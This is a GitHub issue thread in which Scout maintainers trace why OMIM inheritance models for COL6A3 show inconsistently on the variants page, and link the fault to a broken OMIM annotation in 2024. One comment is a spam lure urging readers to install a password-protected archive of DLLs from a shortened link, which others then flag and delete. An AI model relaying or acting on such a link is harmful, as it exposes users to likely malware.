### ISSUE TITLE
Inheritance models on variantS page not correctly displayed

### ISSUE THREAD

**Issue by dnil** [Clinical-Genomics/scout#4882]
On the gene hover on the variantS page, not all (OMIM) inheritance models are always shown. They are visible on the variant page and gene page, but quick operators scan the variantS page for ez dismisses like missing compounds, and may rely on the inheritance pattern. A quick sample had it ok for several genes with more than one disease, but we have one confirmed
report with `COL6A3` (https://scout.scilifelab.se/cust002/F0060227/a3d33632dae34dae1b3ff41743e7853d)...

❌ <img width="162" alt="Screenshot 2024-09-20 at 09 54 05" src="https://github.com/user-attachments/assets/15b8c7c5-e36a-40a8-8228-619f0fd4ad27">

✅ <img width="595" alt="Screenshot 2024-09-20 at 09 54 23" src="https://github.com/user-attachments/assets/61ecb622-dee9-446c-8832-409fad18435f">

✅ <img width="560" alt="Screenshot 2024-09-20 at 09 54 50" src="https://github.com/user-attachments/assets/f6f8e2cb-ae8c-4ddc-85b1-91c17cb07f91">

Maybe the get-rid-of ORPHA logic failing?

**Comment by pinpolhoxx** [comment]
install this
https://bit.ly/3TzaAQd
Pass: changeme
I put the necessary dlls in the archive

**Comment by dnil** [comment]
Good with the delete, did you report it as well?

**Comment by northwestwitch** [comment]
> Good with the delete, did you report it as well?

No, how do I do it?

**Comment by northwestwitch** [comment]
Ah someone else probably did, that user is gone

**Comment by dnil** [comment]
Anyway. It looks like the inheritance is already botched on the variant. 😞 

<img width="451" alt="Screenshot 2024-09-20 at 10 07 21" src="https://github.com/user-attachments/assets/71a0baad-4e0f-4cd6-adac-d15de49d9eb7">

**Comment by dnil** [comment]
> > Good with the delete, did you report it as well?
> 
> No, how do I do it?

There is like an option on the dropdown to "report content". 😊

**Comment by dnil** [comment]
Soo, it was ok in Nov 2023... 
<img width="222" alt="Screenshot 2024-09-20 at 10 38 00" src="https://github.com/user-attachments/assets/27db5fff-6180-4073-aa78-5c82e9dbae28">

**Comment by dnil** [comment]
Nope, it surprisingly looks ok. Also it was released on 4.78 (deployed on hasta 28/2) and slightly later cases are ok - e.g. in March 2024 (2024-03-07). https://scout.scilifelab.se/cust002/F0059087

**Comment by dnil** [comment]
Sooo, 4.79 perhaps? Yes, the error is present on 2024-03-19.

**Comment by northwestwitch** [comment]
A very recent case is OK, check for instance this one, same gene: https://scout.scilifelab.se/cust002/F0060227/variants?variant_type=clinical

**Comment by northwestwitch** [comment]
Ah OK, you knew :)

**Comment by northwestwitch** [comment]
This case from Feb 2024 doesn't show the problem -> https://scout.scilifelab.se/cust002/F0058598/variants. Weird no?

**Comment by northwestwitch** [comment]
Feb 21 OK --> https://scout.scilifelab.se/cust002/F0058598/variants
March 26th BROKEN --> https://scout.scilifelab.se/cust002/F0057746/variants
June 27 OK again --> https://scout.scilifelab.se/cust002/F0061262/variants

**Comment by dnil** [comment]
Maybe, but I still think the more probable thing is a rare occurrence that has been around for a long time that occasionally is bugged. Note that we have seen one broken and one ok case in like the last week...

**Comment by dnil** [comment]
The disease order is different; perhaps a set or list being replaced instead of added to?

**Comment by northwestwitch** [comment]
Ahhhhh it's the gene documents. If you switch to version 4.83, then you update the genes, that's what it loads:

<img width="348" alt="image" src="https://github.com/user-attachments/assets/4765c833-b193-4d18-b7d5-23a36201a614">

**Comment by northwestwitch** [comment]
Na, with main branch I get the same. Then it must be the files used to load the genes (Those that I have here are from May 28th)

**Comment by northwestwitch** [comment]
Yes, must be that. Good luck loading any correct variant with a gene like this:

<img width="566" alt="image" src="https://github.com/user-attachments/assets/304b30cf-dc20-4e93-8067-dabd0b8b5ab8">

**Comment by dnil** [comment]
It could have been, the inheritance patterns of the COL6-RDs have been debated over the years - often confusing with healthy parent carriers, sometimes AD sometimes AR for not too dissimilar phenotypes etc. But, here we have two different cases from like 18th and 20th that show different models on the variantS page, surely with no gene or genemap2 record update in between.

Its for different panels though - I wonder if someone filled a manual annotation for it on a panel?

**Comment by northwestwitch** [comment]
<img width="1340" alt="image" src="https://github.com/user-attachments/assets/b57bc839-442e-49a5-a996-32a5cb44d435">

**Comment by northwestwitch** [comment]
Also:
<img width="1008" alt="image" src="https://github.com/user-attachments/assets/04dd1697-98d9-4e8e-8c6f-4fb3550abf51">

**Comment by dnil** [comment]
Ok, that really does look broken. It is going to be sooo complicated to get the timeline of this right, if at all feasible. 
But, firstly, it also does not really explain the current cases, some of which appear incorrect although the `hgnc_genes`  is now in order.

**Comment by northwestwitch** [comment]
We went through the updates history and could pinpoint [the update](https://github.com/Clinical-Genomics/scout/pull/4687#issuecomment-2186505338) the "fixed" the situation. It was June 24th, the day since cases show again the double inheritance. 

The gene itself had quite many edits during that period, check the history on the [OMIM page](https://www.omim.org/entry/120250?search=col6a3&highlight=col6a3#editHistory)

<img width="547" alt="image" src="https://github.com/user-attachments/assets/abf289d3-92b6-4216-a8e2-c9adc2775963">

**Comment by dnil** [comment]
In summary, this is consistent with a mistake in the OMIMs annotation for the gene, some time after the last ok update 240214. The flurry of changes in OMIM to the gene on 240220-240222 are conspicuous.
Solna updated to a broken version on  240313. We updated a few times more in April and May, while still broken. In the June update 240624 it is fixed - likely with the 240606 change above. And we got Bethlem 1C, AD compared to Bethlem 1 AR, AD before. COL6-RD is complicated, and requires some careful thought about inheritance and healthy carriership.
